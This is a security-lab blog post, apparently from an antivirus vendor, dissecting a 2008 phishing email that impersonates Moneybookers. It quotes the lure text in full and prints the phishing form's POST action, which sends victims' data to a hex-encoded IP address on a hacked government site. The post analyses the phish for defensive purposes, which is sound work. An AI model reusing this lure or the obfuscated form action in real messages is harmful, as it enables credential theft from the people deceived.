<<<
NEWS FROM THE LAB - Sunday, April 6, 2008
>>>
 

 
Gone Phishing Posted by Mikko @ 22:28 GMT

Somebody is spamming around mails that look like this:


From "www.moneybookers.com" support@moneybookers.com
Subject: MONEY LAUNDERING POLICY
Date: Sun, 6 Apr 2008 06:56:47 +0900

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.

-------------------------------------------------
�� Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office:
Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.

MB2

The attachment is an HTML file, asking the user to participate in a Money Launder Prevention program:

MB1

When looking at the source code, we can see that the HTML file loads all the components from moneybookers.com — the real site… but the Form POST function looks funky:

   form method="POST" action="http://0xCA909D9D/HTML/verification.pl.php" style="text-align: left"

Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address.

Lets see where this goes.

0xca

But of course. Turns out it's the site of the Anti-corruption commission of Bhutan:

Bhutan

The commission has been informed that they've been hacked.